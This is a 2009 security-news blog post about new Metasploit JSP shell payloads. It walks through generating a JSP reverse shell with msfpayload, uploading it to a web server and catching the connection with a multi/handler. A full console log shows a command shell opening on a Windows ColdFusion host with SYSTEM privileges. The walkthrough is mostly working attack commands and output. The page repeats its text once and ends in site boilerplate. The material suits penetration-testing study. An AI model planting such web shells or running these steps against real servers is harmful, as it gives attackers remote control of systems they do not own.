Metasploit JSP Shells

Metasploit JSP Shells click to see full-size image
Stephen Fewer has pushed up a jsp reverse and jsp bind shell.http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/javaI'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rbyomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jspFrom there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole =[ msf v3.3-dev [core:3.3 api:1.0]+ -- --=[ 432 exploits - 261 payloads+ -- --=[ 21 encoders - 8 nops =[ 222 auxmsf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcpset PAYLOAD java/jsp_shell_reverse_tcp msf exploit(handler) > set LHOST 192.168.10.1LHOST => 192.168.10.1msf exploit(handler) > info Name: Generic Payload Handler Version: 6558 Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP Privileged: No License: Metasploit Framework License (BSD)Provided by: hdmAvailable targets:Id Name-- ----0 Wildcard TargetPayload information:Space: 100000Avoid: 0 charactersDescription:This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.msf exploit(handler) > show optionsModule options: Name Current Setting Required Description ---- --------------- -------- -----------Payload options (java/jsp_shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.10.1 yes The local address LPORT 4444 yes The local port SHELL cmd.exe yes The system shell to use.Exploit target: Id Name -- ---- 0 Wildcard Targetmsf exploit(handler) > exploit[*] Starting the payload handler...[*] Started reverse handler[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:ColdFusion8runtimebin> whoamiwhoamint authoritysystemC:ColdFusion8runtimebin>exitexit[*] Command shell session 1 closed.

Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb

yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info

Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)

Provided by:
hdm

Available targets:
Id Name
-- ----
0 Wildcard Target

Payload information:
Space: 100000
Avoid: 0 characters


Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.

msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ColdFusion8\runtime\bin> whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>exit
exit

[*] Command shell session 1 closed.


Read Full Article
GSO
Written on Thursday, 22 October 2009 08:55 by GSO

Viewed 90 times so far.
Like this? Tweet it to your followers!
Published in Subscribe to the RSS feed of Network Security & Hacking News  Network Security & Hacking News / Subscribe to the RSS feed of Latest Security News  Latest Security News
Like this? Let your friends know now!

Rate this article

Latest articles from GSO

Latest 'tweets' from GovernmentSecurity

  • News Update: Cyber war is coming, the impact could be huge: CBS News reports that cyber.. http://bit.ly/1tx1kr | #Security Link Monday, 09 November 2009 07:35
  • News Update: Tenable Network #Security Podcast - Episode 11: Welcome to the Tenable Netw.. http://bit.ly/2Iqd6G | Security Link Monday, 09 November 2009 07:35
  • News Update: Consent will be required for cookies in Europe: EDITORIAL: A law that dema.. http://bit.ly/3JYgip | #Security Link Monday, 09 November 2009 07:35
  • News Update: CBS 60 Minutes tackles cyber-terrorism: Could hackers get into the compute.. http://bit.ly/2d5Y21 | #Security Link Monday, 09 November 2009 07:35
  • Blog Update: We have launched the new GovernmentSecurity.org: We decided to launch th.. http://bit.ly/2G1SSF | #Security Link Saturday, 07 November 2009 17:38
blog comments powered by Disqus
back to top

Site Search

Disqus Tools